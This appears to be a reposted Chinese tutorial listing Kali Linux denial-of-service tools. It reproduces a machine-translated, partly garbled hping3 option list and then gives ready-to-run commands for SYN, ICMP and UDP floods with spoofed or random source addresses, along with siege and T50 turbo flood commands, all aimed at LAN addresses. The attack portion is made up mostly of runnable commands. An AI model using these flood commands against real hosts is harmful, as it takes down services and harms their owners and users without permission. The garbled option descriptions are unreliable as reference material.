kali linux之拒絕服務攻擊工具


hping3

幾乎可以定制發送任何TCP/IP數據包,用於測試FW,端口掃描,性能測試

 

-c - 計數包計數
  -i - interval wait(uX表示X微秒,例如-i u1000)
       - -i u10000的快速別名(第二個10個數據包)
       - -i u1000的快速別名(第二個100個數據包)
       --flood盡可能快地發送數據包。不要顯示回復。
  -n - 數字數字輸出
  -q - 安靜
  -I - 接口接口名稱(否則為默認路由接口)
  -V - verbose verbose模式
  -D - 調試調試信息
  -z - 綁定ctrl + z到ttl(默認為dst端口)
  -Z - unbind unbind ctrl + z - 為收到的每個匹配數據包發出蜂鳴聲


模式
  默認模式TCP
  -0 - RAIP RAW IP模式
  -1 - icmp ICMP模式
  -2 - 表示UDP模式
  -8 - 掃描SCAN模式。示例:hping --scan 1-30,70-90 -S www.target.host
  -9 - 聽聽模式


IP
  -a - 欺騙欺騙源地址
  --rand-dest隨機destionation地址模式。看到那個男人。
  --rand-source隨機源地址模式。看到那個男人。
  -t --ttl ttl(默認64)
  -N - id id(默認隨機)
  -W --winid使用win * id字節排序
  -r --rel相對化id字段(估計主機流量)
  -f --frag分割更多碎片的數據包。 (可以通過弱acl)
  -x --morefrag設置更多片段標志
  -y --dontfrag set不分片標志
  -g --fragoff設置片段偏移量
  -m --mtu設置虛擬mtu,暗示--frag如果數據包大小> mtu
  -o --tos服務類型(默認為0x00),嘗試--tos幫助
  -G --rroute包含RECORD_ROUTE選項並顯示路由緩沖區
  --lsrr松散的源路由和記錄路由
  --ssrr嚴格的源路由和記錄路由
  -H --ipproto僅在RAW IP模式下設置IP協議字段


ICMP
  -C --icmptype icmp type(默認回顯請求)
  -K - icmpcode icmp code(默認為0)
      --force-icmp發送所有icmp類型(默認發送僅支持的類型)
      --icmp-gw設置ICMP重定向的網關地址(默認為0.0.0.0)
      --icmp-ts別名為--icmp --icmptype 13(ICMP時間戳)
      --icmp-addr別名為--icmp --icmptype 17(ICMP地址子網掩碼)
      --icmp-help顯示其他icmp選項的幫助


UDP / TCP
  -s --baseport基本源端口(默認隨機)
  -P --destport [+] [+] <port>目標端口(默認為0)ctrl + z inc / dec
  -k - 保持靜止源端口
  -w --win winsize(默認64)
  -O -​​-tcpoff設置假tcp數據偏移量(而不是tcphdrlen / 4)
  -Q --seqnum僅顯示tcp序列號
  -b --badcksum(嘗試)發送具有錯誤IP校驗和的數據包
                   許多系統將修復發送數據包的IP校驗和
                   所以你會得到錯誤的UDP / TCP校驗和。
  -M --setseq設置TCP序列號
  -L --setack設置TCP確認
  -F --fin設置FIN標志
  -S --syn設置SYN標志
  -R - 首先設置RST標志
  -P --push設置PUSH標志
  -A --ack設置ACK標志
  -U - 設置URG標志
  -X --xmas設置X未使用標志(0x40)
  -Y --ymas設置Y未使用標志(0x80)
  --tcpexitcode使用最后的tcp-> th_flags作為退出代碼
  --tcp-mss啟用具有給定值的TCP MSS選項
  --tcp-timestamp啟用TCP時間戳選項以猜測HZ /正常運行時間


同項
  -d - 數據數據大小(默認為0)
  -E - 文件中的文件數據
  -e --sign添加'簽名'
  -j --dump以十六進制轉儲數據包
  -J --print轉儲可打印字符
  -B --safe啟用“安全”協議
  -u --end告訴你--file何時達到EOF並防止倒帶
  -T --traceroute traceroute mode(暗示--bind和--ttl 1)
  --tr-stop在traceroute模式下收到第一個非ICMP時退出
  --tr-keep-ttl保持源TTL固定,僅用於監視一跳
  --tr-no-rtt不要在traceroute模式下計算/顯示RTT信息,ARS包描述(新的,不穩定的)
  --apd-send發送APD描述的數據包

 

syn flood攻擊

hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.1.12

hping3 -S -P -U -p 80 --flood --rand-source 192.168.1.12

hping3 -SARFUP -p 80 --flood --rand-source 192.168.1.12

 

icmp flood攻擊

hping3 -q -n -a 192.168.1.12 --icmp -d 56 --flood 192.168.1.10

 

udp flood攻擊

hping3 -a 192.168.1.12 --udp -s 53 -d 100 -p 53 --flood 192.168.1.10

 

 

Siege:http/https壓力測試工具,模擬多個用戶並發訪問請求
 siege -g http://192.168.1.12/xxsec.php / 192.168.1.12


T50
t50 192.168.1.12 --flood --turbo -S --protocol TCP --dport 80
t50 192.168.1.12 --flood --turbo -S TCP UDP OSPF EIGRP --dport 22 

 

 

 友情鏈接 http://www.cnblogs.com/klionsec

               http://www.cnblogs.com/l0cm

               http://www.cnblogs.com/Anonyaptxxx

               http://www.feiyusafe.cn

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM